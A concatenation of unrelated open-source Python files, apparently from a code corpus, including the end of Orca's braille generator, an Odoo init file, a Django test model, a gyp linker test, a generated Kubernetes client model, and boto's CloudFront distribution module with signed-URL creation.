pyatspi.ROLE_SLIDER,
pyatspi.ROLE_TOGGLE_BUTTON]
isWidget = lambda x: x and x.getRole() in widgetRoles
result = []
if obj.parent and obj.parent.getRole() == pyatspi.ROLE_LIST_BOX:
widgets = self._script.utilities.findAllDescendants(obj, isWidget)
for widget in widgets:
result.extend(self.generate(widget, includeContext=False))
result.append(braille.Region(" "))
return result
def _generateProgressBarIndex(self, obj, **args):
if not args.get('isProgressBarUpdate') \
or not self._shouldPresentProgressBarUpdate(obj, **args):
return []
acc, updateTime, updateValue = self._getMostRecentProgressBarUpdate()
if acc != obj:
number, count = self.getProgressBarNumberAndCount(obj)
return ['%s' % number]
return []
def _generateProgressBarValue(self, obj, **args):
if args.get('isProgressBarUpdate') \
and not self._shouldPresentProgressBarUpdate(obj, **args):
return []
return self._generatePercentage(obj, **args)
def _generatePercentage(self, obj, **args):
percent = self._script.utilities.getValueAsPercent(obj)
if percent is not None:
return ['%s%%' % percent]
return []
def _getProgressBarUpdateInterval(self):
interval = _settingsManager.getSetting('progressBarBrailleInterval')
if interval is None:
return super()._getProgressBarUpdateInterval()
return int(interval)
def _shouldPresentProgressBarUpdate(self, obj, **args):
if not _settingsManager.getSetting('brailleProgressBarUpdates'):
return False
return super()._shouldPresentProgressBarUpdate(obj, **args)
#####################################################################
# #
# Unfortunate hacks. #
# #
#####################################################################
def _generateAsPageTabOrScrollPane(self, obj, **args):
"""If this scroll pane is labelled by a page tab, then return the page
tab information for the braille context instead. Thunderbird
folder properties is such a case. See bug #507922 for more
details.
"""
result = []
labels = self._script.utilities.labelsForObject(obj)
for label in labels:
result.extend(self.generate(label, **args))
break
if not result:
# NOTE: there is no REAL_ROLE_SCROLL_PANE in formatting.py
# because currently fallback to the default formatting.
# We will provide the support for someone to override this,
# however, so we use REAL_ROLE_SCROLL_PANE here.
#
oldRole = self._overrideRole('REAL_ROLE_SCROLL_PANE', args)
result.extend(self.generate(obj, **args))
self._restoreRole(oldRole, args)
return result
def _generateIncludeContext(self, obj, **args):
"""Returns True or False to indicate whether context should be
included or not.
"""
if args.get('isProgressBarUpdate'):
return False
# For multiline text areas, we only show the context if we
# are on the very first line. Otherwise, we show only the
# line.
#
include = _settingsManager.getSetting('enableBrailleContext')
if not include:
return include
try:
text = obj.queryText()
except NotImplementedError:
text = None
if text and (self._script.utilities.isTextArea(obj) \
or (obj.getRole() in [pyatspi.ROLE_LABEL])):
try:
[lineString, startOffset, endOffset] = text.getTextAtOffset(
text.caretOffset, pyatspi.TEXT_BOUNDARY_LINE_START)
except:
return include
include = startOffset == 0
if include:
for relation in obj.getRelationSet():
if relation.getRelationType() \
== pyatspi.RELATION_FLOWS_FROM:
include = not self._script.utilities.\
isTextArea(relation.getTarget(0))
return include
#####################################################################
# #
# Other things for spacing #
# #
#####################################################################
def _generateEol(self, obj, **args):
result = []
if not _settingsManager.getSetting('disableBrailleEOL'):
if not args.get('mode', None):
args['mode'] = self._mode
args['stringType'] = 'eol'
result.append(self._script.formatting.getString(**args))
return result
def space(self, delimiter=" "):
if delimiter == " ":
return SPACE
else:
return [Space(delimiter)]
def asString(self, content, delimiter=" "):
combined = ""
prior = None
if isinstance(content, str):
combined = content
elif content and isinstance(content, list):
# Strip off leading and trailing spaces.
#
while content and isinstance(content[0], Space):
content = content[1:]
while content and isinstance(content[-1], Space):
content = content[0:-1]
for element in content:
if isinstance(element, Space) and prior:
combined += element.delimiter
prior = None
else:
prior = self.asString(element)
combined = self._script.utilities.appendString(
combined, prior, delimiter)
return combined
|
darmaa/odoo | refs/heads/master | addons/account_followup/report/__init__.py | 447 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import account_followup_print
import account_followup_report
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
rlugojr/django | refs/heads/master | tests/from_db_value/models.py | 26 | import decimal
from django.db import models
class Cash(decimal.Decimal):
currency = 'USD'
def __str__(self):
s = super().__str__(self)
return '%s %s' % (s, self.currency)
class CashField(models.DecimalField):
def __init__(self, **kwargs):
kwargs['max_digits'] = 20
kwargs['decimal_places'] = 2
super().__init__(**kwargs)
def from_db_value(self, value, expression, connection, context):
cash = Cash(value)
cash.vendor = connection.vendor
return cash
class CashModel(models.Model):
cash = CashField()
def __str__(self):
return str(self.cash)
|
scripni/rethinkdb | refs/heads/next | external/v8_3.30.33.16/build/gyp/test/win/gyptest-link-fixed-base.py | 344 | #!/usr/bin/env python
# Copyright (c) 2012 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""
Make sure fixed base setting is extracted properly.
"""
import TestGyp
import sys
if sys.platform == 'win32':
test = TestGyp.TestGyp(formats=['msvs', 'ninja'])
CHDIR = 'linker-flags'
test.run_gyp('fixed-base.gyp', chdir=CHDIR)
test.build('fixed-base.gyp', test.ALL, chdir=CHDIR)
def GetHeaders(exe):
full_path = test.built_file_path(exe, chdir=CHDIR)
return test.run_dumpbin('/headers', full_path)
# For exe, default is fixed, for dll, it's not fixed.
if 'Relocations stripped' not in GetHeaders('test_fixed_default_exe.exe'):
test.fail_test()
if 'Relocations stripped' in GetHeaders('test_fixed_default_dll.dll'):
test.fail_test()
# Explicitly not fixed.
if 'Relocations stripped' in GetHeaders('test_fixed_no.exe'):
test.fail_test()
# Explicitly fixed.
if 'Relocations stripped' not in GetHeaders('test_fixed_yes.exe'):
test.fail_test()
test.pass_test()
|
mbohlool/client-python | refs/heads/master | kubernetes/client/models/v1beta2_daemon_set.py | 1 | # coding: utf-8
"""
Kubernetes
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen)
OpenAPI spec version: v1.8.2
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from pprint import pformat
from six import iteritems
import re
class V1beta2DaemonSet(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'api_version': 'str',
'kind': 'str',
'metadata': 'V1ObjectMeta',
'spec': 'V1beta2DaemonSetSpec',
'status': 'V1beta2DaemonSetStatus'
}
attribute_map = {
'api_version': 'apiVersion',
'kind': 'kind',
'metadata': 'metadata',
'spec': 'spec',
'status': 'status'
}
def __init__(self, api_version=None, kind=None, metadata=None, spec=None, status=None):
"""
V1beta2DaemonSet - a model defined in Swagger
"""
self._api_version = None
self._kind = None
self._metadata = None
self._spec = None
self._status = None
self.discriminator = None
if api_version is not None:
self.api_version = api_version
if kind is not None:
self.kind = kind
if metadata is not None:
self.metadata = metadata
if spec is not None:
self.spec = spec
if status is not None:
self.status = status
@property
def api_version(self):
"""
Gets the api_version of this V1beta2DaemonSet.
APIVersion defines the versioned schema of this representation of an object. Servers should convert recognized schemas to the latest internal value, and may reject unrecognized values. More info: https://git.k8s.io/community/contributors/devel/api-conventions.md#resources
:return: The api_version of this V1beta2DaemonSet.
:rtype: str
"""
return self._api_version
@api_version.setter
def api_version(self, api_version):
"""
Sets the api_version of this V1beta2DaemonSet.
APIVersion defines the versioned schema of this representation of an object. Servers should convert recognized schemas to the latest internal value, and may reject unrecognized values. More info: https://git.k8s.io/community/contributors/devel/api-conventions.md#resources
:param api_version: The api_version of this V1beta2DaemonSet.
:type: str
"""
self._api_version = api_version
@property
def kind(self):
"""
Gets the kind of this V1beta2DaemonSet.
Kind is a string value representing the REST resource this object represents. Servers may infer this from the endpoint the client submits requests to. Cannot be updated. In CamelCase. More info: https://git.k8s.io/community/contributors/devel/api-conventions.md#types-kinds
:return: The kind of this V1beta2DaemonSet.
:rtype: str
"""
return self._kind
@kind.setter
def kind(self, kind):
"""
Sets the kind of this V1beta2DaemonSet.
Kind is a string value representing the REST resource this object represents. Servers may infer this from the endpoint the client submits requests to. Cannot be updated. In CamelCase. More info: https://git.k8s.io/community/contributors/devel/api-conventions.md#types-kinds
:param kind: The kind of this V1beta2DaemonSet.
:type: str
"""
self._kind = kind
@property
def metadata(self):
"""
Gets the metadata of this V1beta2DaemonSet.
Standard object's metadata. More info: https://git.k8s.io/community/contributors/devel/api-conventions.md#metadata
:return: The metadata of this V1beta2DaemonSet.
:rtype: V1ObjectMeta
"""
return self._metadata
@metadata.setter
def metadata(self, metadata):
"""
Sets the metadata of this V1beta2DaemonSet.
Standard object's metadata. More info: https://git.k8s.io/community/contributors/devel/api-conventions.md#metadata
:param metadata: The metadata of this V1beta2DaemonSet.
:type: V1ObjectMeta
"""
self._metadata = metadata
@property
def spec(self):
"""
Gets the spec of this V1beta2DaemonSet.
The desired behavior of this daemon set. More info: https://git.k8s.io/community/contributors/devel/api-conventions.md#spec-and-status
:return: The spec of this V1beta2DaemonSet.
:rtype: V1beta2DaemonSetSpec
"""
return self._spec
@spec.setter
def spec(self, spec):
"""
Sets the spec of this V1beta2DaemonSet.
The desired behavior of this daemon set. More info: https://git.k8s.io/community/contributors/devel/api-conventions.md#spec-and-status
:param spec: The spec of this V1beta2DaemonSet.
:type: V1beta2DaemonSetSpec
"""
self._spec = spec
@property
def status(self):
"""
Gets the status of this V1beta2DaemonSet.
The current status of this daemon set. This data may be out of date by some window of time. Populated by the system. Read-only. More info: https://git.k8s.io/community/contributors/devel/api-conventions.md#spec-and-status
:return: The status of this V1beta2DaemonSet.
:rtype: V1beta2DaemonSetStatus
"""
return self._status
@status.setter
def status(self, status):
"""
Sets the status of this V1beta2DaemonSet.
The current status of this daemon set. This data may be out of date by some window of time. Populated by the system. Read-only. More info: https://git.k8s.io/community/contributors/devel/api-conventions.md#spec-and-status
:param status: The status of this V1beta2DaemonSet.
:type: V1beta2DaemonSetStatus
"""
self._status = status
def to_dict(self):
"""
Returns the model properties as a dict
"""
result = {}
for attr, _ in iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""
Returns the string representation of the model
"""
return pformat(self.to_dict())
def __repr__(self):
"""
For `print` and `pprint`
"""
return self.to_str()
def __eq__(self, other):
"""
Returns true if both objects are equal
"""
if not isinstance(other, V1beta2DaemonSet):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""
Returns true if both objects are not equal
"""
return not self == other
|
jvanbrug/alanaldavista | refs/heads/master | boto/cloudfront/distribution.py | 5 | # Copyright (c) 2006-2009 Mitch Garnaat http://garnaat.org/
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
import uuid
import base64
import time
from boto.compat import json
from boto.cloudfront.identity import OriginAccessIdentity
from boto.cloudfront.object import Object, StreamingObject
from boto.cloudfront.signers import ActiveTrustedSigners, TrustedSigners
from boto.cloudfront.logging import LoggingInfo
from boto.cloudfront.origin import S3Origin, CustomOrigin
from boto.s3.acl import ACL
class DistributionConfig(object):
def __init__(self, connection=None, origin=None, enabled=False,
caller_reference='', cnames=None, comment='',
trusted_signers=None, default_root_object=None,
logging=None):
"""
:param origin: Origin information to associate with the
distribution. If your distribution will use
an Amazon S3 origin, then this should be an
S3Origin object. If your distribution will use
a custom origin (non Amazon S3), then this
should be a CustomOrigin object.
:type origin: :class:`boto.cloudfront.origin.S3Origin` or
:class:`boto.cloudfront.origin.CustomOrigin`
:param enabled: Whether the distribution is enabled to accept
end user requests for content.
:type enabled: bool
:param caller_reference: A unique number that ensures the
request can't be replayed. If no
caller_reference is provided, boto
will generate a type 4 UUID for use
as the caller reference.
:type enabled: str
:param cnames: A CNAME alias you want to associate with this
distribution. You can have up to 10 CNAME aliases
per distribution.
:type enabled: array of str
:param comment: Any comments you want to include about the
distribution.
:type comment: str
:param trusted_signers: Specifies any AWS accounts you want to
permit to create signed URLs for private
content. If you want the distribution to
use signed URLs, this should contain a
TrustedSigners object; if you want the
distribution to use basic URLs, leave
this None.
:type trusted_signers: :class`boto.cloudfront.signers.TrustedSigners`
:param default_root_object: Designates a default root object.
Only include a DefaultRootObject value
if you are going to assign a default
root object for the distribution.
:type comment: str
:param logging: Controls whether access logs are written for the
distribution. If you want to turn on access logs,
this should contain a LoggingInfo object; otherwise
it should contain None.
:type logging: :class`boto.cloudfront.logging.LoggingInfo`
"""
self.connection = connection
self.origin = origin
self.enabled = enabled
if caller_reference:
self.caller_reference = caller_reference
else:
self.caller_reference = str(uuid.uuid4())
self.cnames = []
if cnames:
self.cnames = cnames
self.comment = comment
self.trusted_signers = trusted_signers
self.logging = logging
self.default_root_object = default_root_object
def to_xml(self):
s = '<?xml version="1.0" encoding="UTF-8"?>\n'
s += '<DistributionConfig xmlns="http://cloudfront.amazonaws.com/doc/2010-07-15/">\n'
if self.origin:
s += self.origin.to_xml()
s += ' <CallerReference>%s</CallerReference>\n' % self.caller_reference
for cname in self.cnames:
s += ' <CNAME>%s</CNAME>\n' % cname
if self.comment:
s += ' <Comment>%s</Comment>\n' % self.comment
s += ' <Enabled>'
if self.enabled:
s += 'true'
else:
s += 'false'
s += '</Enabled>\n'
if self.trusted_signers:
s += '<TrustedSigners>\n'
for signer in self.trusted_signers:
if signer == 'Self':
s += ' <Self></Self>\n'
else:
s += ' <AwsAccountNumber>%s</AwsAccountNumber>\n' % signer
s += '</TrustedSigners>\n'
if self.logging:
s += '<Logging>\n'
s += ' <Bucket>%s</Bucket>\n' % self.logging.bucket
s += ' <Prefix>%s</Prefix>\n' % self.logging.prefix
s += '</Logging>\n'
if self.default_root_object:
dro = self.default_root_object
s += '<DefaultRootObject>%s</DefaultRootObject>\n' % dro
s += '</DistributionConfig>\n'
return s
def startElement(self, name, attrs, connection):
if name == 'TrustedSigners':
self.trusted_signers = TrustedSigners()
return self.trusted_signers
elif name == 'Logging':
self.logging = LoggingInfo()
return self.logging
elif name == 'S3Origin':
self.origin = S3Origin()
return self.origin
elif name == 'CustomOrigin':
self.origin = CustomOrigin()
return self.origin
else:
return None
def endElement(self, name, value, connection):
if name == 'CNAME':
self.cnames.append(value)
elif name == 'Comment':
self.comment = value
elif name == 'Enabled':
if value.lower() == 'true':
self.enabled = True
else:
self.enabled = False
elif name == 'CallerReference':
self.caller_reference = value
elif name == 'DefaultRootObject':
self.default_root_object = value
else:
setattr(self, name, value)
class StreamingDistributionConfig(DistributionConfig):
def __init__(self, connection=None, origin='', enabled=False,
caller_reference='', cnames=None, comment='',
trusted_signers=None, logging=None):
super(StreamingDistributionConfig, self).__init__(connection=connection,
origin=origin, enabled=enabled,
caller_reference=caller_reference,
cnames=cnames, comment=comment,
trusted_signers=trusted_signers,
logging=logging)
def to_xml(self):
s = '<?xml version="1.0" encoding="UTF-8"?>\n'
s += '<StreamingDistributionConfig xmlns="http://cloudfront.amazonaws.com/doc/2010-07-15/">\n'
if self.origin:
s += self.origin.to_xml()
s += ' <CallerReference>%s</CallerReference>\n' % self.caller_reference
for cname in self.cnames:
s += ' <CNAME>%s</CNAME>\n' % cname
if self.comment:
s += ' <Comment>%s</Comment>\n' % self.comment
s += ' <Enabled>'
if self.enabled:
s += 'true'
else:
s += 'false'
s += '</Enabled>\n'
if self.trusted_signers:
s += '<TrustedSigners>\n'
for signer in self.trusted_signers:
if signer == 'Self':
s += ' <Self/>\n'
else:
s += ' <AwsAccountNumber>%s</AwsAccountNumber>\n' % signer
s += '</TrustedSigners>\n'
if self.logging:
s += '<Logging>\n'
s += ' <Bucket>%s</Bucket>\n' % self.logging.bucket
s += ' <Prefix>%s</Prefix>\n' % self.logging.prefix
s += '</Logging>\n'
s += '</StreamingDistributionConfig>\n'
return s
class DistributionSummary(object):
def __init__(self, connection=None, domain_name='', id='',
last_modified_time=None, status='', origin=None,
cname='', comment='', enabled=False):
self.connection = connection
self.domain_name = domain_name
self.id = id
self.last_modified_time = last_modified_time
self.status = status
self.origin = origin
self.enabled = enabled
self.cnames = []
if cname:
self.cnames.append(cname)
self.comment = comment
self.trusted_signers = None
self.etag = None
self.streaming = False
def startElement(self, name, attrs, connection):
if name == 'TrustedSigners':
self.trusted_signers = TrustedSigners()
return self.trusted_signers
elif name == 'S3Origin':
self.origin = S3Origin()
return self.origin
elif name == 'CustomOrigin':
self.origin = CustomOrigin()
return self.origin
return None
def endElement(self, name, value, connection):
if name == 'Id':
self.id = value
elif name == 'Status':
self.status = value
elif name == 'LastModifiedTime':
self.last_modified_time = value
elif name == 'DomainName':
self.domain_name = value
elif name == 'Origin':
self.origin = value
elif name == 'CNAME':
self.cnames.append(value)
elif name == 'Comment':
self.comment = value
elif name == 'Enabled':
if value.lower() == 'true':
self.enabled = True
else:
self.enabled = False
elif name == 'StreamingDistributionSummary':
self.streaming = True
else:
setattr(self, name, value)
def get_distribution(self):
return self.connection.get_distribution_info(self.id)
class StreamingDistributionSummary(DistributionSummary):
def get_distribution(self):
return self.connection.get_streaming_distribution_info(self.id)
class Distribution(object):
def __init__(self, connection=None, config=None, domain_name='',
id='', last_modified_time=None, status=''):
self.connection = connection
self.config = config
self.domain_name = domain_name
self.id = id
self.last_modified_time = last_modified_time
self.status = status
self.in_progress_invalidation_batches = 0
self.active_signers = None
self.etag = None
self._bucket = None
self._object_class = Object
def startElement(self, name, attrs, connection):
if name == 'DistributionConfig':
self.config = DistributionConfig()
return self.config
elif name == 'ActiveTrustedSigners':
self.active_signers = ActiveTrustedSigners()
return self.active_signers
else:
return None
def endElement(self, name, value, connection):
if name == 'Id':
self.id = value
elif name == 'LastModifiedTime':
self.last_modified_time = value
elif name == 'Status':
self.status = value
elif name == 'InProgressInvalidationBatches':
self.in_progress_invalidation_batches = int(value)
elif name == 'DomainName':
self.domain_name = value
else:
setattr(self, name, value)
def update(self, enabled=None, cnames=None, comment=None):
"""
Update the configuration of the Distribution. The only values
of the DistributionConfig that can be directly updated are:
* CNAMES
* Comment
* Whether the Distribution is enabled or not
Any changes to the ``trusted_signers`` or ``origin`` properties of
this distribution's current config object will also be included in
the update. Therefore, to set the origin access identity for this
distribution, set ``Distribution.config.origin.origin_access_identity``
before calling this update method.
:type enabled: bool
:param enabled: Whether the Distribution is active or not.
:type cnames: list of str
:param cnames: The DNS CNAME's associated with this
Distribution. Maximum of 10 values.
:type comment: str or unicode
:param comment: The comment associated with the Distribution.
"""
new_config = DistributionConfig(self.connection, self.config.origin,
self.config.enabled, self.config.caller_reference,
self.config.cnames, self.config.comment,
self.config.trusted_signers,
self.config.default_root_object)
if enabled is not None:
new_config.enabled = enabled
if cnames is not None:
new_config.cnames = cnames
if comment is not None:
new_config.comment = comment
self.etag = self.connection.set_distribution_config(self.id, self.etag, new_config)
self.config = new_config
self._object_class = Object
def enable(self):
"""
Activate the Distribution. A convenience wrapper around
the update method.
"""
self.update(enabled=True)
def disable(self):
"""
Deactivate the Distribution. A convenience wrapper around
the update method.
"""
self.update(enabled=False)
def delete(self):
"""
Delete this CloudFront Distribution. The content
associated with the Distribution is not deleted from
the underlying Origin bucket in S3.
"""
self.connection.delete_distribution(self.id, self.etag)
def _get_bucket(self):
if isinstance(self.config.origin, S3Origin):
if not self._bucket:
bucket_dns_name = self.config.origin.dns_name
bucket_name = bucket_dns_name.replace('.s3.amazonaws.com', '')
from boto.s3.connection import S3Connection
s3 = S3Connection(self.connection.aws_access_key_id,
self.connection.aws_secret_access_key,
proxy=self.connection.proxy,
proxy_port=self.connection.proxy_port,
proxy_user=self.connection.proxy_user,
proxy_pass=self.connection.proxy_pass)
self._bucket = s3.get_bucket(bucket_name)
self._bucket.distribution = self
self._bucket.set_key_class(self._object_class)
return self._bucket
else:
raise NotImplementedError('Unable to get_objects on CustomOrigin')
def get_objects(self):
"""
Return a list of all content objects in this distribution.
:rtype: list of :class:`boto.cloudfront.object.Object`
:return: The content objects
"""
bucket = self._get_bucket()
objs = []
for key in bucket:
objs.append(key)
return objs
def set_permissions(self, object, replace=False):
"""
Sets the S3 ACL grants for the given object to the appropriate
value based on the type of Distribution. If the Distribution
is serving private content the ACL will be set to include the
Origin Access Identity associated with the Distribution. If
the Distribution is serving public content the content will
be set up with "public-read".
:type object: :class:`boto.cloudfront.object.Object`
:param enabled: The Object whose ACL is being set
:type replace: bool
:param replace: If False, the Origin Access Identity will be
appended to the existing ACL for the object.
If True, the ACL for the object will be
completely replaced with one that grants
READ permission to the Origin Access Identity.
"""
if isinstance(self.config.origin, S3Origin):
if self.config.origin.origin_access_identity:
id = self.config.origin.origin_access_identity.split('/')[-1]
oai = self.connection.get_origin_access_identity_info(id)
policy = object.get_acl()
if replace:
policy.acl = ACL()
policy.acl.add_user_grant('READ', oai.s3_user_id)
object.set_acl(policy)
else:
object.set_canned_acl('public-read')
def set_permissions_all(self, replace=False):
"""
Sets the S3 ACL grants for all objects in the Distribution
to the appropriate value based on the type of Distribution.
:type replace: bool
:param replace: If False, the Origin Access Identity will be
appended to the existing ACL for the object.
If True, the ACL for the object will be
completely replaced with one that grants
READ permission to the Origin Access Identity.
"""
bucket = self._get_bucket()
for key in bucket:
self.set_permissions(key, replace)
def add_object(self, name, content, headers=None, replace=True):
"""
Adds a new content object to the Distribution. The content
for the object will be copied to a new Key in the S3 Bucket
and the permissions will be set appropriately for the type
of Distribution.
:type name: str or unicode
:param name: The name or key of the new object.
:type content: file-like object
:param content: A file-like object that contains the content
for the new object.
:type headers: dict
:param headers: A dictionary containing additional headers
you would like associated with the new
object in S3.
:rtype: :class:`boto.cloudfront.object.Object`
:return: The newly created object.
"""
if self.config.origin.origin_access_identity:
policy = 'private'
else:
policy = 'public-read'
bucket = self._get_bucket()
object = bucket.new_key(name)
object.set_contents_from_file(content, headers=headers, policy=policy)
if self.config.origin.origin_access_identity:
self.set_permissions(object, replace)
return object
def create_signed_url(self, url, keypair_id,
expire_time=None, valid_after_time=None,
ip_address=None, policy_url=None,
private_key_file=None, private_key_string=None):
"""
Creates a signed CloudFront URL that is only valid within the specified
parameters.
:type url: str
:param url: The URL of the protected object.
:type keypair_id: str
:param keypair_id: The keypair ID of the Amazon KeyPair used to sign
theURL. This ID MUST correspond to the private key
specified with private_key_file or private_key_string.
:type expire_time: int
:param expire_time: The expiry time of the URL. If provided, the URL
will expire after the time has passed. If not provided the URL will
never expire. Format is a unix epoch.
Use time.time() + duration_in_sec.
:type valid_after_time: int
:param valid_after_time: If provided, the URL will not be valid until
after valid_after_time. Format is a unix epoch.
Use time.time() + secs_until_valid.
:type ip_address: str
:param ip_address: If provided, only allows access from the specified
IP address. Use '192.168.0.10' for a single IP or
use '192.168.0.0/24' CIDR notation for a subnet.
:type policy_url: str
:param policy_url: If provided, allows the signature to contain
wildcard globs in the URL. For example, you could
provide: 'http://example.com/media/\*' and the policy
and signature would allow access to all contents of
the media subdirectory. If not specified, only
allow access to the exact url provided in 'url'.
:type private_key_file: str or file object.
:param private_key_file: If provided, contains the filename of the
private key file used for signing or an open
file object containing the private key
contents. Only one of private_key_file or
private_key_string can be provided.
:type private_key_string: str
:param private_key_string: If provided, contains the private key string
used for signing. Only one of private_key_file or
private_key_string can be provided.
:rtype: str
:return: The signed URL.
"""
# Get the required parameters
params = self._create_signing_params(
url=url, keypair_id=keypair_id, expire_time=expire_time,
valid_after_time=valid_after_time, ip_address=ip_address,
policy_url=policy_url, private_key_file=private_key_file,
private_key_string=private_key_string)
#combine these into a full url
if "?" in url:
sep = "&"
else:
sep = "?"
signed_url_params = []
for key in ["Expires", "Policy", "Signature", "Key-Pair-Id"]:
if key in params:
param = "%s=%s" % (key, params[key])
signed_url_params.append(param)
signed_url = url + sep + "&".join(signed_url_params)
return signed_url
def _create_signing_params(self, url, keypair_id,
expire_time=None, valid_after_time=None,
ip_address=None, policy_url=None,
private_key_file=None, private_key_string=None):
"""
Creates the required URL parameters for a signed URL.
"""
params = {}
# Check if we can use a canned policy
if expire_time and not valid_after_time and not ip_address and not policy_url:
# we manually construct this policy string to ensure formatting
# matches signature
policy = self._canned_policy(url, expire_time)
params["Expires"] = str(expire_time)
else:
# If no policy_url is specified, default to the full url.
if policy_url is None:
policy_url = url
# Can't use canned policy
policy = self._custom_policy(policy_url, expires=expire_time,
valid_after=valid_after_time,
ip_address=ip_address)
encoded_policy = self._url_base64_encode(policy)
params["Policy"] = encoded_policy
#sign the policy
signature = self._sign_string(policy, private_key_file, private_key_string)
#now base64 encode the signature (URL safe as well)
encoded_signature = self._url_base64_encode(signature)
params["Signature"] = encoded_signature
params["Key-Pair-Id"] = keypair_id
return params
@staticmethod
def _canned_policy(resource, expires):
"""
Creates a canned policy string.
"""
policy = ('{"Statement":[{"Resource":"%(resource)s",'
'"Condition":{"DateLessThan":{"AWS:EpochTime":'
'%(expires)s}}}]}' % locals())
return policy
@staticmethod
def _custom_policy(resource, expires=None, valid_after=None, ip_address=None):
"""
Creates a custom policy string based on the supplied parameters.
"""
condition = {}
# SEE: http://docs.amazonwebservices.com/AmazonCloudFront/latest/DeveloperGuide/RestrictingAccessPrivateContent.html#CustomPolicy
# The 'DateLessThan' property is required.
if not expires:
# Defaults to ONE day
expires = int(time.time()) + 86400
condition["DateLessThan"] = {"AWS:EpochTime": expires}
if valid_after:
condition["DateGreaterThan"] = {"AWS:EpochTime": valid_after}
if ip_address:
if '/' not in ip_address:
ip_address += "/32"
condition["IpAddress"] = {"AWS:SourceIp": ip_address}
policy = {"Statement": [{
"Resource": resource,
"Condition": condition}]}
return json.dumps(policy, separators=(",", ":"))
@staticmethod
def _sign_string(message, private_key_file=None, private_key_string=None):
"""
Signs a string for use with Amazon CloudFront.
Requires the rsa library be installed.
"""
try:
import rsa
except ImportError:
raise NotImplementedError("Boto depends on the python rsa "
"library to generate signed URLs for "
"CloudFront")
# Make sure only one of private_key_file and private_key_string is set
if private_key_file and private_key_string:
raise ValueError("Only specify the private_key_file or the private_key_string not both")
if not private_key_file and not private_key_string:
raise ValueError("You must specify one of private_key_file or private_key_string")
# If private_key_file is a file name, open it and read it
if private_key_string is None:
if isinstance(private_key_file, basestring):
with open(private_key_file, 'r') as file_handle:
private_key_string = file_handle.read()
# Otherwise, treat it like a file
else:
private_key_string = private_key_file.read()
# Sign it!
private_key = rsa.PrivateKey.load_pkcs1(private_key_string)
signature = rsa.sign(str(message), private_key, 'SHA-1')
return signature
@staticmethod
def _url_base64_encode(msg):
"""
Base64 encodes a string using the URL-safe characters specified by
Amazon.
"""
msg_base64 = base64.b64encode(msg)
msg_base64 = msg_base64.replace('+', '-')
msg_base64 = msg_base64.replace('=', '_')
msg_base64 = msg_base64.replace('/', '~')
return msg_base64
class StreamingDistribution(Distribution):
def __init__(self, connection=None, config=None, domain_name='',
id='', last_modified_time=None, status=''):
super(StreamingDistribution, self).__init__(connection, config,
domain_name, id, last_modified_time, status)
self._object_class = StreamingObject
def startElement(self, name, attrs, connection):
if name == 'StreamingDistributionConfig':
self.config = StreamingDistributionConfig()
return self.config
else:
return super(StreamingDistribution, self).startElement(name, attrs,
connection)
def update(self, enabled=None, cnames=None, comment=None):
"""
Update the configuration of the StreamingDistribution. The only values
of the StreamingDistributionConfig that can be directly updated are:
* CNAMES
* Comment
* Whether the Distribution is enabled or not
Any changes to the ``trusted_signers`` or ``origin`` properties of
this distribution's current config object will also be included in
the update. Therefore, to set the origin access identity for this
distribution, set
``StreamingDistribution.config.origin.origin_access_identity``
before calling this update method.
:type enabled: bool
:param enabled: Whether the StreamingDistribution is active or not.
:type cnames: list of str
:param cnames: The DNS CNAME's associated with this
Distribution. Maximum of 10 values.
:type comment: str or unicode
:param comment: The comment associated with the Distribution.
"""
new_config = StreamingDistributionConfig(self.connection,
self.config.origin,
self.config.enabled,
self.config.caller_reference,
self.config.cnames,
self.config.comment,
self.config.trusted_signers)
if enabled is not None:
new_config.enabled = enabled
if cnames is not None:
new_config.cnames = cnames
if comment is not None:
new_config.comment = comment
self.etag = self.connection.set_streaming_distribution_config(self.id,
self.etag,
new_config)
self.config = new_config
self._object_class = StreamingObject
def delete(self):
self.connection.delete_streaming_distribution(self.id, self.etag)
|
JVillella/tensorflow | refs/heads/master | tensorflow/python/kernel_tests/init_ops_test.py | 67 | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
